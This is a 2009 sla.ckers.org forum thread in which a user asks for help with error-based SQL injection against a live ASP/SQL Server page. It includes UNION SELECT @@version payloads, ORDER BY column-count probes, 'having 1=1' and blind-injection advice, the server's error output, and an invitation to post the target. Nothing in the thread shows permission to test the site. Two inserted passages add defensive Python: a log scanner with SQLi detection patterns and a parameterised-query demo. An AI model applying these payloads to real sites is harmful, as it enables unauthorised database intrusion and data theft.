Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 14, 2009 10:46AM

Yo dudes!

I'm trying to exploit a SQL injection in a field in ASP with SQL Server - error-based SQL injection.

Some information that may be helpful...


UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20int) %20--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'CVP' to data type int.

/include/lang.asp, line 19


UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20text) %20--


Microsoft OLE DB Provider for SQL Server error '80040e14'

All queries combined using a UNION, INTERSECT or EXCEPT operator must
have an equal number of expressions in their target lists.

/include/lang.asp, line 26


UNION %20SELECT %20TOP %201 %20CAST(TABLE_NAME %20 AS %20 ntext)
%20FROM %20INFORMATION_SCHEMA.TABLES--


Microsoft OLE DB Provider for SQL Server error '80040e14'

The ntext data type cannot be selected as DISTINCT because it is not comparable.

/include/lang.asp, line 29


UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version) %20--

Microsoft OLE DB Provider for SQL Server error '80040e14'

All queries combined using a UNION, INTERSECT or EXCEPT operator must
have an equal number of expressions in their target lists.

/include/lang.asp, line 13

As you can see, the injections are not working, and I can't understand why. Can someone give me a hint?

Thank you

Re: Wired MS SQL Injection stuff...
Posted by: lightos
Date: October 14, 2009 03:20PM

Refer to http://sla.ckers.org/forum/read.php?16,31832,31838#msg-31838 and follow the steps.
Just be sure to replace the error message in step 1 with your own.
(All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists).

Once completed, remember to pat yourself on the shoulder for being self-sufficient.

Re: Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 14, 2009 04:23PM

YO lightos

Looks like a good suggestion; however, I did it and couldn't solve the problem.

Can you please explain to me what they mean by "operator must have an equal number of expressions in their target lists"?

At first I was thinking it could be a different number of columns, but I tried...

UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL,NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL,NULL,NULL %20--

And so on and I always get the same error.

Can you please give me a more specific hint?

thank you

Re: Wired MS SQL Injection stuff...
Posted by: lightos
Date: October 14, 2009 09:08PM

You can figure out the # of columns used in the query using order by:

lang.asp?=eng' order by 1--
lang.asp?=eng' order by 2--
lang.asp?=eng' order by 3--

Keep going up until you get an error message.

You could also probably determine the version through error messages, try:
lang.asp?=eng' or 1=@@version--

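From the defensive side, the probes traded in this thread (the UNION ALL SELECT CAST(@@version AS int) payload from the first post, the ORDER BY 1/2/3 column-count walk and the ' or 1=@@version-- trick above) are easy to spot in web-server logs once the query string is URL-decoded. The following Python script is an added example, not code from the thread or from the site under discussion: it runs a few signature checks over constructed IIS-style log lines (sample data made up for this example), correlates repeated ORDER BY n probes from one client against one page as a column-enumeration sequence, and flags injected requests that ended in an HTTP 500, since a verbose database error page is exactly the feedback channel error-based injection depends on.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (fields: date time c-ip cs-method
# cs-uri-stem cs-uri-query sc-status). Sample data made up for this example;
# the query strings mirror the probes discussed in the thread.
SAMPLE_LOG = """\
2009-10-14 10:40:01 10.0.0.7 GET /include/lang.asp lang=eng 200
2009-10-14 10:40:05 10.0.0.7 GET /include/lang.asp lang=eng%20order%20by%201-- 500
2009-10-14 10:40:06 10.0.0.7 GET /include/lang.asp lang=eng%20order%20by%202-- 500
2009-10-14 10:40:07 10.0.0.7 GET /include/lang.asp lang=eng%20order%20by%203-- 500
2009-10-14 10:40:12 10.0.0.7 GET /include/lang.asp lang=eng%20UNION%20ALL%20SELECT%20CAST(@@version%20AS%20int)%20-- 500
2009-10-14 10:41:00 10.0.0.9 GET /include/lang.asp lang=fra 200
2009-10-14 10:41:30 10.0.0.9 GET /products.asp id=12%27%20or%201=@@version-- 500
"""

# Signatures for the probing techniques seen in the thread. They are applied
# to the URL-decoded, whitespace-normalised query string, so %20 padding and
# mixed case cannot hide a keyword.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("version_probe", re.compile(r"@@version", re.I)),
    ("type_cast_error_probe", re.compile(r"\b(cast|convert)\s*\(", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("having_probe", re.compile(r"\bhaving\s+1\s*=\s*1", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("sql_comment_terminator", re.compile(r"--\s*$")),
]
ORDER_BY_NUM = re.compile(r"\border\s+by\s+(\d+)", re.I)


def normalise(query):
    """URL-decode the raw query string and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(query)).strip()


def parse_line(line):
    """Split one constructed log line into a record; returns None if malformed."""
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, c_ip, method, stem, query, status = parts
    return {"ts": f"{date} {time}", "client": c_ip, "method": method,
            "stem": stem, "query": normalise(query), "status": int(status)}


def classify(query):
    """Return the set of signature tags that match a normalised query string."""
    return {tag for tag, pattern in SIGNATURES if pattern.search(query)}


def scan_log(text):
    """Return one finding per suspicious request, in log order.

    Besides per-request signatures, a client that sends three or more distinct
    ORDER BY <n> values against the same page is tagged as enumerating the
    column count, and a flagged request answered with HTTP 5xx is tagged as a
    likely database error leak (the '80040e14' pages quoted in the thread)."""
    findings = []
    order_by_seen = defaultdict(set)  # (client, page) -> {n, ...}
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        tags = classify(rec["query"])
        m = ORDER_BY_NUM.search(rec["query"])
        if m:
            key = (rec["client"], rec["stem"])
            order_by_seen[key].add(int(m.group(1)))
            if len(order_by_seen[key]) >= 3:
                tags.add("column_enumeration_sequence")
        if tags and rec["status"] >= 500:
            tags.add("db_error_response")
        if tags:
            findings.append({**rec, "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["client"], f["stem"], ", ".join(f["tags"]), "|", f["query"])
```

The signatures are deliberately narrow; in practice the strongest signal is the pairing of a decoded query that contains SQL syntax with a 500 response, which is also the cue to replace verbose driver errors with a generic error page so the probes stop returning information.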
Re: Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 15, 2009 02:54PM

Yo lightos

Thanks for your help.

I think this SQL Injection is really strange.

See...

Injecting:

lang.asp?=1' order by 1--

Results in:

Unclosed quotation mark after the character string ' order by 1--'.

It makes me think that there is a problem with quotes or double quotes...

If I inject:

lang.asp?=1%20 order %20 by %20 1--

Results in:

Microsoft OLE DB Provider for SQL Server error '80040e14'

The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator.

If I inject other numbers in order by, like:

lang.asp?=1%20 order %20 by %20 2--
lang.asp?=1%20 order %20 by %20 3--
lang.asp?=1%20 order %20 by %20 4--

Microsoft OLE DB Provider for SQL Server error '80040e14'

The ORDER BY position number X is out of range of the number of items in the select list.

So, I believe the correct number of columns should be 1, right? But at the same time, it doesn't make sense; otherwise my first query should work, no?

My first query: UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version) %20--

Also, I tried the following:

lang.asp?=1%20 order %20 by %20 '1'--

And it resulted in this strange behavior:

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "1 order by '1'--"]'

/include/hdl.inc, line 109

Strange, huh?

Ah, if I try:

' %20or %201=@@version%20--
%20or %201=@@version%20--

It always results in:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Do you really think the problem is related to the number of columns?

Thanks.
Edited 1 time(s). Last edit at 10/15/2009 02:57PM by rickm.

Re: Wired MS SQL Injection stuff...
Posted by: lightos
Date: October 15, 2009 09:47PM

Might be passing through two queries; the first one has only 1 column, the second one has more.
Someone had this problem a couple of days ago http://sla.ckers.org/forum/read.php?16,31532,31835.

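The two-query explanation above is also the reason the fix belongs in the code rather than in the error page: a parameter that is bound instead of spliced stays inert in every query it reaches, however many columns each has. The following Python program is an added example, not the thread's or the site's code, and uses sqlite3 in place of SQL Server; the `languages` table, the `lookup_*` helpers and `probe` are constructed for the illustration. It contrasts the string-splicing pattern behind the errors quoted in this thread with a parameterised lookup, using the same `order by N--` probes; the "ORDER BY term out of range" error sqlite raises for the spliced version is the analogue of the SQL Server '80040e14' message above.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's language table (sqlite, not SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE languages (code TEXT PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO languages VALUES (?, ?)",
                     [("eng", "English"), ("fra", "French"), ("por", "Portuguese")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, code):
    """The pattern behind the thread's errors: the request parameter is spliced
    into the SQL text, so a quote closes the literal and whatever follows
    (ORDER BY, a -- comment) runs as SQL. Kept deliberately unsafe for contrast."""
    sql = f"SELECT name FROM languages WHERE code = '{code}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, code):
    """The fix: the value is bound as a parameter and never becomes SQL text,
    whichever query, or how many queries, it is passed to."""
    sql = "SELECT name FROM languages WHERE code = ?"
    return [row[0] for row in conn.execute(sql, (code,))]


def probe(conn, lookup, code):
    """Run one request and return what the client would learn: the rows, or
    the database error text, which the ASP page in the thread echoes back."""
    try:
        return {"rows": lookup(conn, code), "error": None}
    except sqlite3.Error as exc:
        return {"rows": None, "error": str(exc)}


# Constructed inputs: a normal value plus the ORDER BY probes from the thread.
PROBES = ["eng", "eng' order by 1--", "eng' order by 2--"]


def compare(conn):
    """Run every probe through both lookups; maps probe -> (spliced, parameterised)."""
    return {p: (probe(conn, lookup_vulnerable, p), probe(conn, lookup_parameterised, p))
            for p in PROBES}


if __name__ == "__main__":
    for p, (vuln, safe) in compare(make_db()).items():
        print(f"input {p!r}\n  spliced:       {vuln}\n  parameterised: {safe}")
```

With the spliced query, `order by 1--` silently succeeds and `order by 2--` returns a driver error, which is the column-count oracle the thread is probing; with the bound parameter, both inputs simply match no row and nothing about the query shape leaks.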
Re: Wired MS SQL Injection stuff...
Posted by: one23
Date: October 16, 2009 09:13AM

About this error:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

It's BLIND, so you have to do BSQL injection. If you like, post the target here so I and others can take a look!

Re: Wired MS SQL Injection stuff...
Posted by: delta
Date: October 19, 2009 03:18PM

try having 1=1--
or ' having 1=1--

Re: Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 19, 2009 08:01PM

Thanks for the answers.
